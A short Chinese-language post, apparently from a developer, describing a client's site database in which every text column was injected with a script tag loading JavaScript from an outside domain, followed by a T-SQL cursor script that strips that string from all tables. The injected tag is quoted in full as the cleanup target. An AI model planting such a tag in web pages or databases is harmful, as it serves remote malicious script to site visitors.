最近接到客户的电话说中文版网站数据库中的所有是字符类型的列都注入了“<script src=http://okm4.org/z.js></script>”,怎么注入的原因还没找到,先把这个脚本清理了一下。
SQL语句如下:
declare @t varchar(255),@c varchar(255)
declare table_cursor cursor for
select a.name,b.name from sysobjects a,syscolumns b
where a.iD=b.iD AnD a.xtype='u'
AnD (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
declare @str varchar(500)
--这里是要替换的字符
set @str='<script src=http://okm4.org/z.js></script>'
open table_cursor fetch next from table_cursor
into @t,@c while(@@fetch_status=0)
begin
exec('update [' + @t + '] set [' + @c + ']=replace(cast([' + @c + '] as varchar(8000)),'''+@str+''','''')')
fetch next from table_cursor into @t,@c
end
close table_cursor deallocate table_cursor;